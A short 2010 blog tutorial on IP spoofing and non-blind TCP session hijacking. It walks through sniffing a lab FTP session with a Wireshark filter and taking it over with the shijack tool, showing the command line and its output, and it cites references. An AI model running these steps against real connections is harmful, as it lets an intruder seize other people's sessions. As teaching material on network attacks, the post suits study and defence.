mercredi 21 avril 2010

basics 4 - tutorial IP spoofing - TCP not blind hijacking

Ip spoffing means sending IP packets with a fake address. This technique is used to conduct a MAN IN THE MIDDLE (MIM) or a DENIAL OF SERVICE (DDOS) attack. The target machine believes it speaks with another machine. TCP hijacking is an MIM attack technique. The attacker intercalate itself in a TCP session between two other machines.
This article is a tutorial to conduct MORRIS attack (1985 [11] using this tutorial [13]. The reader could take advantage of this presentation too: [12].
French version available on the site.

Client starts a TCP connexion with server (for example, using Filezilla):


the Intrus listens to the network with Wireshark:
filter:
(ip.src == 192.168.0.10 and ip.dst == 192.168.0.2) or (ip.src == 192.168.0.2 and ip.dst == 192.168.0.10)


As long as Intrus does nothing, the TCP session remains in active state (Filezilla can still communicate with FTP server).

Then, Intrus uses  shijack
$ sudo ./shijack-lnx eth1 192.168.0.10 1061 192.168.0.2 21

Waiting for SEQ/ACK to arrive from the srcip to the dstip.
(To speed things up, try making some traffic between the two, /msg person asdf
Got packet! SEQ = 0x7cd72b3d ACK = 0xaaefbd1d
Starting hijack session, Please use ^C to terminate.
Anything you enter from now on is sent to the hijacked TCP connection.
From now, Intrus takes place of client in TCP session. Intrus must be aware of the fact that client must not reset the connexion (send a RST packet to serveur).

Client does not receive anymore packet from serveur and closes the connexion:

references

11) TCP hikacking - Morris attack - http://www.thetazzone.com/tutorial-a-quick-introduction-to-tcp-session-hijacking/
12) IP spoofing - http://www.commentcamarche.net/contents/attaques/usurpation-ip-spoofing.php3
13) TCP not blind hijacking avec (spwny) shijack http://www.exploit-db.com/papers/11102
14) Michal Zalewski – Strange Attractors and TCP/IP Sequence number analysis – One year later - http://lcamtuf.coredump.cx/newtcp/

Aucun commentaire:

Publier un commentaire